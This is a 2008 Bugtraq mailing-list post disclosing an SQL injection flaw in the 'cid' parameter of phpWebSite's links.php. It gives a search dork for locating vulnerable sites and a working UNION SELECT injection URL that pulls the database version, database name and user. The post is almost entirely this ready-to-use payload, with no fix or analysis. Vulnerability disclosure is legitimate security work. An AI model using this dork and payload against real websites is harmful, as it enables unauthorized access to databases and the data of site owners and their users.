
Date: 31 Oct 2008 04:20:52 -0000
From: beenudel1986@...il.com
To: bugtraq@...urityfocus.com
Subject: phpWebSite links.php Sql Injection

################################################################ 
# 
# Author: Beenu Arora
# 
# Home  : www.BeenuArora.com 
# 
# Email : beenudel1986@...il.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: phpWebSite links.php Sql Injection 

#
# Vendor: http://phpwebsite.appstate.edu/

# 
#
###########################################################
#
# d0rk:powered by phpWebSite
#
###########################################################
 
        
     
     Live Demo: 
	http://localhost/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())--

     

###########################################################
#
#  Bug discovered : 30 Oct.2008
###########################################################
<< http://packetstormsecurity.org/0810-exploits/phpwebsitelink-sql.txt>>
